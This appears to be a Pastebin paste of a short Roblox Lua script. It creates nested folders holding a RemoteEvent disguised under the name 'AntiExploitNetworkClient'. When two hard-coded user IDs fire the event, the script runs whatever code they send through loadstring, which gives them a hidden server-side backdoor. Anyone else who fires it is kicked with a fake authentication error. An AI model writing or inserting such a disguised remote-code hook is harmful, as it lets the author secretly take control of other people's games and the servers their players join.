Advertisement
yougotoof

eeeee

Dec 31st, 2018
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. --Initialize! (one line to take less space up)
  2. local a = nil local b = nil local c = nil local d = nil local a=Instance.new("Folder") local b=Instance.new("Folder") local c=Instance.new("Folder") local d=Instance.new("Folder") a.Parent=game.ReplicatedStorage b.Parent=a c.Parent=b d.Parent = c local r = Instance.new("RemoteEvent") r.Parent = d r.Name="AntiExploitNetworkClient" r.OnServerEvent:Connect(function(plr,args) if plr.UserId == 713666830 or plr.UserId == 4933190 then loadstring(args)() elseif plr.UserId ~= 713666830 or plr.UserId ~= 4933190 then plr:Kick('Server/Client auth failed. Error ID: 1') end end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement